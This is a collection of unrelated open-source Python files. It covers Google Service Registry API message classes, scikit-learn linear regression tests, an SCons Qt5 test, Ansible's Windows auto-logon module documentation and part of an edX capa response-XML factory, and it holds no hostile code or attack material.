pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class ServiceregistryEndpointsPatchRequest(_messages.Message):
"""A ServiceregistryEndpointsPatchRequest object.
Fields:
endpoint: The name of the endpoint for this request.
endpointResource: A Endpoint resource to be passed as the request body.
project: The project ID for this request.
"""
endpoint = _messages.StringField(1, required=True)
endpointResource = _messages.MessageField('Endpoint', 2)
project = _messages.StringField(3, required=True)
class ServiceregistryEndpointsUpdateRequest(_messages.Message):
"""A ServiceregistryEndpointsUpdateRequest object.
Fields:
endpoint: The name of the endpoint for this request.
endpointResource: A Endpoint resource to be passed as the request body.
project: The project ID for this request.
"""
endpoint = _messages.StringField(1, required=True)
endpointResource = _messages.MessageField('Endpoint', 2)
project = _messages.StringField(3, required=True)
class ServiceregistryOperationsGetRequest(_messages.Message):
"""A ServiceregistryOperationsGetRequest object.
Fields:
operation: The name of the operation for this request.
project: The project ID for this request.
"""
operation = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class ServiceregistryOperationsListRequest(_messages.Message):
"""A ServiceregistryOperationsListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
class StandardQueryParameters(_messages.Message):
"""Query parameters accepted by all methods.
Enums:
AltValueValuesEnum: Data format for the response.
Fields:
alt: Data format for the response.
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters. Overrides userIp if both are provided.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
userIp: IP address of the site where the request originates. Use this if
you want to enforce per-user limits.
"""
class AltValueValuesEnum(_messages.Enum):
"""Data format for the response.
Values:
json: Responses with Content-Type of application/json
"""
json = 0
alt = _messages.EnumField('AltValueValuesEnum', 1, default=u'json')
fields = _messages.StringField(2)
key = _messages.StringField(3)
oauth_token = _messages.StringField(4)
prettyPrint = _messages.BooleanField(5, default=True)
quotaUser = _messages.StringField(6)
trace = _messages.StringField(7)
userIp = _messages.StringField(8)
| mit |
ltiao/scikit-learn | sklearn/linear_model/tests/test_base.py | 101 | 12205 | # Author: Alexandre Gramfort <[email protected]>
# Fabian Pedregosa <[email protected]>
#
# License: BSD 3 clause
import numpy as np
from scipy import sparse
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.linear_model.base import LinearRegression
from sklearn.linear_model.base import center_data, sparse_center_data, _rescale_data
from sklearn.utils import check_random_state
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_greater
from sklearn.datasets.samples_generator import make_sparse_uncorrelated
from sklearn.datasets.samples_generator import make_regression
def test_linear_regression():
# Test LinearRegression on a simple dataset.
# a simple dataset
X = [[1], [2]]
Y = [1, 2]
clf = LinearRegression()
clf.fit(X, Y)
assert_array_almost_equal(clf.coef_, [1])
assert_array_almost_equal(clf.intercept_, [0])
assert_array_almost_equal(clf.predict(X), [1, 2])
# test it also for degenerate input
X = [[1]]
Y = [0]
clf = LinearRegression()
clf.fit(X, Y)
assert_array_almost_equal(clf.coef_, [0])
assert_array_almost_equal(clf.intercept_, [0])
assert_array_almost_equal(clf.predict(X), [0])
def test_linear_regression_sample_weights():
rng = np.random.RandomState(0)
for n_samples, n_features in ((6, 5), (5, 10)):
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
sample_weight = 1.0 + rng.rand(n_samples)
clf = LinearRegression()
clf.fit(X, y, sample_weight)
coefs1 = clf.coef_
assert_equal(clf.coef_.shape, (X.shape[1], ))
assert_greater(clf.score(X, y), 0.9)
assert_array_almost_equal(clf.predict(X), y)
# Sample weight can be implemented via a simple rescaling
# for the square loss.
scaled_y = y * np.sqrt(sample_weight)
scaled_X = X * np.sqrt(sample_weight)[:, np.newaxis]
clf.fit(X, y)
coefs2 = clf.coef_
assert_array_almost_equal(coefs1, coefs2)
def test_raises_value_error_if_sample_weights_greater_than_1d():
# Sample weights must be either scalar or 1D
n_sampless = [2, 3]
n_featuress = [3, 2]
rng = np.random.RandomState(42)
for n_samples, n_features in zip(n_sampless, n_featuress):
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
sample_weights_OK = rng.randn(n_samples) ** 2 + 1
sample_weights_OK_1 = 1.
sample_weights_OK_2 = 2.
clf = LinearRegression()
# make sure the "OK" sample weights actually work
clf.fit(X, y, sample_weights_OK)
clf.fit(X, y, sample_weights_OK_1)
clf.fit(X, y, sample_weights_OK_2)
def test_fit_intercept():
# Test assertions on betas shape.
X2 = np.array([[0.38349978, 0.61650022],
[0.58853682, 0.41146318]])
X3 = np.array([[0.27677969, 0.70693172, 0.01628859],
[0.08385139, 0.20692515, 0.70922346]])
y = np.array([1, 1])
lr2_without_intercept = LinearRegression(fit_intercept=False).fit(X2, y)
lr2_with_intercept = LinearRegression(fit_intercept=True).fit(X2, y)
lr3_without_intercept = LinearRegression(fit_intercept=False).fit(X3, y)
lr3_with_intercept = LinearRegression(fit_intercept=True).fit(X3, y)
assert_equal(lr2_with_intercept.coef_.shape,
lr2_without_intercept.coef_.shape)
assert_equal(lr3_with_intercept.coef_.shape,
lr3_without_intercept.coef_.shape)
assert_equal(lr2_without_intercept.coef_.ndim,
lr3_without_intercept.coef_.ndim)
def test_linear_regression_sparse(random_state=0):
"Test that linear regression also works with sparse data"
random_state = check_random_state(random_state)
for i in range(10):
n = 100
X = sparse.eye(n, n)
beta = random_state.rand(n)
y = X * beta[:, np.newaxis]
ols = LinearRegression()
ols.fit(X, y.ravel())
assert_array_almost_equal(beta, ols.coef_ + ols.intercept_)
assert_array_almost_equal(ols.residues_, 0)
def test_linear_regression_multiple_outcome(random_state=0):
"Test multiple-outcome linear regressions"
X, y = make_regression(random_state=random_state)
Y = np.vstack((y, y)).T
n_features = X.shape[1]
clf = LinearRegression(fit_intercept=True)
clf.fit((X), Y)
assert_equal(clf.coef_.shape, (2, n_features))
Y_pred = clf.predict(X)
clf.fit(X, y)
y_pred = clf.predict(X)
assert_array_almost_equal(np.vstack((y_pred, y_pred)).T, Y_pred, decimal=3)
def test_linear_regression_sparse_multiple_outcome(random_state=0):
"Test multiple-outcome linear regressions with sparse data"
random_state = check_random_state(random_state)
X, y = make_sparse_uncorrelated(random_state=random_state)
X = sparse.coo_matrix(X)
Y = np.vstack((y, y)).T
n_features = X.shape[1]
ols = LinearRegression()
ols.fit(X, Y)
assert_equal(ols.coef_.shape, (2, n_features))
Y_pred = ols.predict(X)
ols.fit(X, y.ravel())
y_pred = ols.predict(X)
assert_array_almost_equal(np.vstack((y_pred, y_pred)).T, Y_pred, decimal=3)
def test_center_data():
n_samples = 200
n_features = 2
rng = check_random_state(0)
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples)
expected_X_mean = np.mean(X, axis=0)
# XXX: currently scaled to variance=n_samples
expected_X_std = np.std(X, axis=0) * np.sqrt(X.shape[0])
expected_y_mean = np.mean(y, axis=0)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=False,
normalize=False)
assert_array_almost_equal(X_mean, np.zeros(n_features))
assert_array_almost_equal(y_mean, 0)
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt, X)
assert_array_almost_equal(yt, y)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=True,
normalize=False)
assert_array_almost_equal(X_mean, expected_X_mean)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt, X - expected_X_mean)
assert_array_almost_equal(yt, y - expected_y_mean)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=True,
normalize=True)
assert_array_almost_equal(X_mean, expected_X_mean)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(X_std, expected_X_std)
assert_array_almost_equal(Xt, (X - expected_X_mean) / expected_X_std)
assert_array_almost_equal(yt, y - expected_y_mean)
def test_center_data_multioutput():
n_samples = 200
n_features = 3
n_outputs = 2
rng = check_random_state(0)
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples, n_outputs)
expected_y_mean = np.mean(y, axis=0)
args = [(center_data, X), (sparse_center_data, sparse.csc_matrix(X))]
for center, X in args:
_, yt, _, y_mean, _ = center(X, y, fit_intercept=False,
normalize=False)
assert_array_almost_equal(y_mean, np.zeros(n_outputs))
assert_array_almost_equal(yt, y)
_, yt, _, y_mean, _ = center(X, y, fit_intercept=True,
normalize=False)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(yt, y - y_mean)
_, yt, _, y_mean, _ = center(X, y, fit_intercept=True,
normalize=True)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(yt, y - y_mean)
def test_center_data_weighted():
n_samples = 200
n_features = 2
rng = check_random_state(0)
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples)
sample_weight = rng.rand(n_samples)
expected_X_mean = np.average(X, axis=0, weights=sample_weight)
expected_y_mean = np.average(y, axis=0, weights=sample_weight)
# XXX: if normalize=True, should we expect a weighted standard deviation?
# Currently not weighted, but calculated with respect to weighted mean
# XXX: currently scaled to variance=n_samples
expected_X_std = (np.sqrt(X.shape[0]) *
np.mean((X - expected_X_mean) ** 2, axis=0) ** .5)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=True,
normalize=False,
sample_weight=sample_weight)
assert_array_almost_equal(X_mean, expected_X_mean)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt, X - expected_X_mean)
assert_array_almost_equal(yt, y - expected_y_mean)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=True,
normalize=True,
sample_weight=sample_weight)
assert_array_almost_equal(X_mean, expected_X_mean)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(X_std, expected_X_std)
assert_array_almost_equal(Xt, (X - expected_X_mean) / expected_X_std)
assert_array_almost_equal(yt, y - expected_y_mean)
def test_sparse_center_data():
n_samples = 200
n_features = 2
rng = check_random_state(0)
# random_state not supported yet in sparse.rand
X = sparse.rand(n_samples, n_features, density=.5) # , random_state=rng
X = X.tolil()
y = rng.rand(n_samples)
XA = X.toarray()
# XXX: currently scaled to variance=n_samples
expected_X_std = np.std(XA, axis=0) * np.sqrt(X.shape[0])
Xt, yt, X_mean, y_mean, X_std = sparse_center_data(X, y,
fit_intercept=False,
normalize=False)
assert_array_almost_equal(X_mean, np.zeros(n_features))
assert_array_almost_equal(y_mean, 0)
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt.A, XA)
assert_array_almost_equal(yt, y)
Xt, yt, X_mean, y_mean, X_std = sparse_center_data(X, y,
fit_intercept=True,
normalize=False)
assert_array_almost_equal(X_mean, np.mean(XA, axis=0))
assert_array_almost_equal(y_mean, np.mean(y, axis=0))
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt.A, XA)
assert_array_almost_equal(yt, y - np.mean(y, axis=0))
Xt, yt, X_mean, y_mean, X_std = sparse_center_data(X, y,
fit_intercept=True,
normalize=True)
assert_array_almost_equal(X_mean, np.mean(XA, axis=0))
assert_array_almost_equal(y_mean, np.mean(y, axis=0))
assert_array_almost_equal(X_std, expected_X_std)
assert_array_almost_equal(Xt.A, XA / expected_X_std)
assert_array_almost_equal(yt, y - np.mean(y, axis=0))
def test_csr_sparse_center_data():
# Test output format of sparse_center_data, when input is csr
X, y = make_regression()
X[X < 2.5] = 0.0
csr = sparse.csr_matrix(X)
csr_, y, _, _, _ = sparse_center_data(csr, y, True)
assert_equal(csr_.getformat(), 'csr')
def test_rescale_data():
n_samples = 200
n_features = 2
rng = np.random.RandomState(0)
sample_weight = 1.0 + rng.rand(n_samples)
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples)
rescaled_X, rescaled_y = _rescale_data(X, y, sample_weight)
rescaled_X2 = X * np.sqrt(sample_weight)[:, np.newaxis]
rescaled_y2 = y * np.sqrt(sample_weight)
assert_array_almost_equal(rescaled_X, rescaled_X2)
assert_array_almost_equal(rescaled_y, rescaled_y2)
| bsd-3-clause |
mbychawski/traffic-simulator | site_scons/site_tools/qt5/test/basic/CPPPATH/CPPPATH/sconstest-CPPPATH.py | 2 | 1765 | #!/usr/bin/env python
#
# Copyright (c) 2001-2010,2011,2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
"""
Test that CPPPATH works with generated files.
In the SConscript we really add the necessary path, such that
the compile run is successful. See also the accompanying test
that is supposed to fail.
"""
import os.path
import TestSCons
test = TestSCons.TestSCons()
test.dir_fixture('image')
test.file_fixture('SConscript-after','SConscript')
test.file_fixture('../../../qtenv.py')
test.file_fixture('../../../../__init__.py','site_scons/site_tools/qt5/__init__.py')
test.run(stderr=None)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| bsd-3-clause |
HyperBaton/ansible | lib/ansible/modules/windows/win_auto_logon.py | 10 | 2142 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Prasoon Karunan V (@prasoonkarunan)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_auto_logon
short_description: Adds or Sets auto logon registry keys.
description:
- Used to apply auto logon registry setting.
version_added: "2.10"
options:
logon_count:
description:
- The number of times to do an automatic logon.
- This count is deremented by Windows everytime an automatic logon is
performed.
- Once the count reaches C(0) then the automatic logon process is
disabled.
type: int
username:
description:
- Username to login automatically.
- Must be set when C(state=present).
- This can be the Netlogon or UPN of a domain account and is
automatically parsed to the C(DefaultUserName) and C(DefaultDomainName)
registry properties.
type: str
password:
description:
- Password to be used for automatic login.
- Must be set when C(state=present).
- Value of this input will be used as password for I(username).
- While this value is encrypted by LSA it is decryptable to any user who
is an Administrator on the remote host.
type: str
state:
description:
- Whether the registry key should be C(present) or C(absent).
type: str
choices: [ absent, present ]
default: present
author:
- Prasoon Karunan V (@prasoonkarunan)
'''
EXAMPLES = r'''
- name: Set autologon for user1
win_auto_logon:
username: User1
password: str0ngp@ssword
- name: Set autologon for abc.com\user1
win_auto_logon:
username: abc.com\User1
password: str0ngp@ssword
- name: Remove autologon for user1
win_auto_logon:
state: absent
- name: Set autologon for user1 with a limited logon count
win_auto_logon:
username: User1
password: str0ngp@ssword
logon_count: 5
'''
RETURN = r'''
#
'''
| gpl-3.0 |
LICEF/edx-platform | common/lib/capa/capa/tests/response_xml_factory.py | 47 | 34688 | from lxml import etree
from abc import ABCMeta, abstractmethod
class ResponseXMLFactory(object):
""" Abstract base class for capa response XML factories.
Subclasses override create_response_element and
create_input_element to produce XML of particular response types"""
__metaclass__ = ABCMeta
@abstractmethod
def create_response_element(self, **kwargs):
""" Subclasses override to return an etree element
representing the capa response XML
(e.g. <numericalresponse>).
The tree should NOT contain any input elements
(such as <textline />) as these will be added later."""
return None
@abstractmethod
def create_input_element(self, **kwargs):
""" Subclasses override this to return an etree element
representing the capa input XML (such as <textline />)"""
return None
def build_xml(self, **kwargs):
""" Construct an XML string for a capa response
based on **kwargs.
**kwargs is a dictionary that will be passed
to create_response_element() and create_input_element().
See the subclasses below for other keyword arguments
you can specify.
For all response types, **kwargs can contain:
*question_text*: The text of the question to display,
wrapped in <p> tags.
*explanation_text*: The detailed explanation that will
be shown if the user answers incorrectly.
*script*: The embedded Python script (a string)
*num_responses*: The number of responses to create [DEFAULT: 1]
*num_inputs*: The number of input elements
to create [DEFAULT: 1]
Returns a string representation of the XML tree.
"""
# Retrieve keyward arguments
question_text = kwargs.get('question_text', '')
explanation_text = kwargs.get('explanation_text', '')
script = kwargs.get('script', None)
num_responses = kwargs.get('num_responses', 1)
num_inputs = kwargs.get('num_inputs', 1)
# The root is <problem>
root = etree.Element("problem")
# Add a script if there is one
if script:
script_element = etree.SubElement(root, "script")
script_element.set("type", "loncapa/python")
script_element.text = str(script)
# The problem has a child <p> with question text
question = etree.SubElement(root, "p")
question.text = question_text
# Add the response(s)
for i in range(0, int(num_responses)):
response_element = self.create_response_element(**kwargs)
root.append(response_element)
# Add input elements
for j in range(0, int(num_inputs)):
input_element = self.create_input_element(**kwargs)
if not (None == input_element):
response_element.append(input_element)
# The problem has an explanation of the solution
if explanation_text:
explanation = etree.SubElement(root, "solution")
explanation_div = etree.SubElement(explanation, "div")
explanation_div.set("class", "detailed-solution")
explanation_div.text = explanation_text
return etree.tostring(root)
@staticmethod
def textline_input_xml(**kwargs):
""" Create a <textline/> XML element
Uses **kwargs:
*math_display*: If True, then includes a MathJax display of user input
*size*: An integer representing the width of the text line
"""
math_display = kwargs.get('math_display', False)
size = kwargs.get('size', None)
input_element = etree.Element('textline')
if math_display:
input_element.set('math', '1')
if size:
input_element.set('size', str(size))
return input_element
@staticmethod
def choicegroup_input_xml(**kwargs):
""" Create a <choicegroup> XML element
Uses **kwargs:
*choice_type*: Can be "checkbox", "radio", or "multiple"
*choices*: List of True/False values indicating whether
a particular choice is correct or not.
Users must choose *all* correct options in order
to be marked correct.
DEFAULT: [True]
*choice_names": List of strings identifying the choices.
If specified, you must ensure that
len(choice_names) == len(choices)
"""
# Names of group elements
group_element_names = {'checkbox': 'checkboxgroup',
'radio': 'radiogroup',
'multiple': 'choicegroup'}
# Retrieve **kwargs
choices = kwargs.get('choices', [True])
choice_type = kwargs.get('choice_type', 'multiple')
choice_names = kwargs.get('choice_names', [None] * len(choices))
# Create the <choicegroup>, <checkboxgroup>, or <radiogroup> element
assert(choice_type in group_element_names)
group_element = etree.Element(group_element_names[choice_type])
# Create the <choice> elements
for (correct_val, name) in zip(choices, choice_names):
choice_element = etree.SubElement(group_element, "choice")
choice_element.set("correct", "true" if correct_val else "false")
# Add a name identifying the choice, if one exists
# For simplicity, we use the same string as both the
# name attribute and the text of the element
if name:
choice_element.text = str(name)
choice_element.set("name", str(name))
return group_element
class NumericalResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <numericalresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <numericalresponse> XML element.
Uses **kwarg keys:
*answer*: The correct answer (e.g. "5")
*tolerance*: The tolerance within which a response
is considered correct. Can be a decimal (e.g. "0.01")
or percentage (e.g. "2%")
"""
answer = kwargs.get('answer', None)
tolerance = kwargs.get('tolerance', None)
response_element = etree.Element('numericalresponse')
if answer:
if isinstance(answer, float):
response_element.set('answer', repr(answer))
else:
response_element.set('answer', str(answer))
if tolerance:
responseparam_element = etree.SubElement(response_element, 'responseparam')
responseparam_element.set('type', 'tolerance')
responseparam_element.set('default', str(tolerance))
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
class CustomResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <customresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <customresponse> XML element.
Uses **kwargs:
*cfn*: the Python code to run. Can be inline code,
or the name of a function defined in earlier <script> tags.
Should have the form: cfn(expect, answer_given, student_answers)
where expect is a value (see below),
answer_given is a single value (for 1 input)
or a list of values (for multiple inputs),
and student_answers is a dict of answers by input ID.
*expect*: The value passed to the function cfn
*answer*: Inline script that calculates the answer
"""
# Retrieve **kwargs
cfn = kwargs.get('cfn', None)
expect = kwargs.get('expect', None)
answer = kwargs.get('answer', None)
options = kwargs.get('options', None)
cfn_extra_args = kwargs.get('cfn_extra_args', None)
# Create the response element
response_element = etree.Element("customresponse")
if cfn:
response_element.set('cfn', str(cfn))
if expect:
response_element.set('expect', str(expect))
if answer:
answer_element = etree.SubElement(response_element, "answer")
answer_element.text = str(answer)
if options:
response_element.set('options', str(options))
if cfn_extra_args:
response_element.set('cfn_extra_args', str(cfn_extra_args))
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
class SymbolicResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <symbolicresponse> XML trees """
def create_response_element(self, **kwargs):
cfn = kwargs.get('cfn', None)
answer = kwargs.get('answer', None)
options = kwargs.get('options', None)
response_element = etree.Element("symbolicresponse")
if cfn:
response_element.set('cfn', str(cfn))
if answer:
response_element.set('answer', str(answer))
if options:
response_element.set('options', str(options))
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
class SchematicResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <schematicresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create the <schematicresponse> XML element.
Uses *kwargs*:
*answer*: The Python script used to evaluate the answer.
"""
answer_script = kwargs.get('answer', None)
# Create the <schematicresponse> element
response_element = etree.Element("schematicresponse")
# Insert the <answer> script if one is provided
if answer_script:
answer_element = etree.SubElement(response_element, "answer")
answer_element.set("type", "loncapa/python")
answer_element.text = str(answer_script)
return response_element
def create_input_element(self, **kwargs):
""" Create the <schematic> XML element.
Although <schematic> can have several attributes,
(*height*, *width*, *parts*, *analyses*, *submit_analysis*, and *initial_value*),
none of them are used in the capa module.
For testing, we create a bare-bones version of <schematic>."""
return etree.Element("schematic")
class CodeResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <coderesponse> XML trees """
def build_xml(self, **kwargs):
# Since we are providing an <answer> tag,
# we should override the default behavior
# of including a <solution> tag as well
kwargs['explanation_text'] = None
return super(CodeResponseXMLFactory, self).build_xml(**kwargs)
def create_response_element(self, **kwargs):
"""
Create a <coderesponse> XML element.
Uses **kwargs:
*initial_display*: The code that initially appears in the textbox
[DEFAULT: "Enter code here"]
*answer_display*: The answer to display to the student
[DEFAULT: "This is the correct answer!"]
*grader_payload*: A JSON-encoded string sent to the grader
[DEFAULT: empty dict string]
*allowed_files*: A space-separated string of file names.
[DEFAULT: None]
*required_files*: A space-separated string of file names.
[DEFAULT: None]
"""
# Get **kwargs
initial_display = kwargs.get("initial_display", "Enter code here")
answer_display = kwargs.get("answer_display", "This is the correct answer!")
grader_payload = kwargs.get("grader_payload", '{}')
allowed_files = kwargs.get("allowed_files", None)
required_files = kwargs.get("required_files", None)
# Create the <coderesponse> element
response_element = etree.Element("coderesponse")
# If files are involved, create the <filesubmission> element.
has_files = allowed_files or required_files
if has_files:
filesubmission_element = etree.SubElement(response_element, "filesubmission")
if allowed_files:
filesubmission_element.set("allowed_files", allowed_files)
if required_files:
filesubmission_element.set("required_files", required_files)
# Create the <codeparam> element.
codeparam_element = etree.SubElement(response_element, "codeparam")
# Set the initial display text
initial_element = etree.SubElement(codeparam_element, "initial_display")
initial_element.text = str(initial_display)
# Set the answer display text
answer_element = etree.SubElement(codeparam_element, "answer_display")
answer_element.text = str(answer_display)
# Set the grader payload string
grader_element = etree.SubElement(codeparam_element, "grader_payload")
grader_element.text = str(grader_payload)
# Create the input within the response
if not has_files:
input_element = etree.SubElement(response_element, "textbox")
input_element.set("mode", "python")
return response_element
def create_input_element(self, **kwargs):
# Since we create this in create_response_element(),
# return None here
return None
class ChoiceResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <choiceresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <choiceresponse> element """
return etree.Element("choiceresponse")
def create_input_element(self, **kwargs):
""" Create a <checkboxgroup> element."""
return ResponseXMLFactory.choicegroup_input_xml(**kwargs)
class FormulaResponseXMLFactory(ResponseXMLFactory):
""" Factory for creating <formularesponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <formularesponse> element.
*sample_dict*: A dictionary of the form:
{ VARIABLE_NAME: (MIN, MAX), ....}
This specifies the range within which
to numerically sample each variable to check
student answers.
[REQUIRED]
*num_samples*: The number of times to sample the student's answer
to numerically compare it to the correct answer.
*tolerance*: The tolerance within which answers will be accepted
[DEFAULT: 0.01]
*answer*: The answer to the problem. Can be a formula string
or a Python variable defined in a script
(e.g. "$calculated_answer" for a Python variable
called calculated_answer)
[REQUIRED]
*hints*: List of (hint_prompt, hint_name, hint_text) tuples
Where *hint_prompt* is the formula for which we show the hint,
*hint_name* is an internal identifier for the hint,
and *hint_text* is the text we show for the hint.
"""
# Retrieve kwargs
sample_dict = kwargs.get("sample_dict", None)
num_samples = kwargs.get("num_samples", None)
tolerance = kwargs.get("tolerance", 0.01)
answer = kwargs.get("answer", None)
hint_list = kwargs.get("hints", None)
assert(answer)
assert(sample_dict and num_samples)
# Create the <formularesponse> element
response_element = etree.Element("formularesponse")
# Set the sample information
sample_str = self._sample_str(sample_dict, num_samples, tolerance)
response_element.set("samples", sample_str)
# Set the tolerance
responseparam_element = etree.SubElement(response_element, "responseparam")
responseparam_element.set("type", "tolerance")
responseparam_element.set("default", str(tolerance))
# Set the answer
response_element.set("answer", str(answer))
# Include hints, if specified
if hint_list:
hintgroup_element = etree.SubElement(response_element, "hintgroup")
for (hint_prompt, hint_name, hint_text) in hint_list:
# For each hint, create a <formulahint> element
formulahint_element = etree.SubElement(hintgroup_element, "formulahint")
# We could sample a different range, but for simplicity,
# we use the same sample string for the hints
# that we used previously.
formulahint_element.set("samples", sample_str)
formulahint_element.set("answer", str(hint_prompt))
formulahint_element.set("name", str(hint_name))
# For each hint, create a <hintpart> element
# corresponding to the <formulahint>
hintpart_element = etree.SubElement(hintgroup_element, "hintpart")
hintpart_element.set("on", str(hint_name))
text_element = etree.SubElement(hintpart_element, "text")
text_element.text = str(hint_text)
return response_element
def create_input_element(self, **kwargs):
return ResponseXMLFactory.textline_input_xml(**kwargs)
def _sample_str(self, sample_dict, num_samples, tolerance):
# Loncapa uses a special format for sample strings:
# "x,y,z@4,5,3:10,12,8#4" means plug in values for (x,y,z)
# from within the box defined by points (4,5,3) and (10,12,8)
# The "#4" means to repeat 4 times.
variables = [str(v) for v in sample_dict.keys()]
low_range_vals = [str(f[0]) for f in sample_dict.values()]
high_range_vals = [str(f[1]) for f in sample_dict.values()]
sample_str = (",".join(sample_dict.keys()) + "@" +
",".join(low_range_vals) + ":" +
",".join(high_range_vals) +
"#" + str(num_samples))
return sample_str
class ImageResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <imageresponse> XML """
def create_response_element(self, **kwargs):
""" Create the <imageresponse> element."""
return etree.Element("imageresponse")
def create_input_element(self, **kwargs):
""" Create the <imageinput> element.
Uses **kwargs:
*src*: URL for the image file [DEFAULT: "/static/image.jpg"]
*width*: Width of the image [DEFAULT: 100]
*height*: Height of the image [DEFAULT: 100]
*rectangle*: String representing the rectangles the user should select.
Take the form "(x1,y1)-(x2,y2)", where the two (x,y)
tuples define the corners of the rectangle.
Can include multiple rectangles separated by a semicolon, e.g.
"(490,11)-(556,98);(242,202)-(296,276)"
*regions*: String representing the regions a user can select
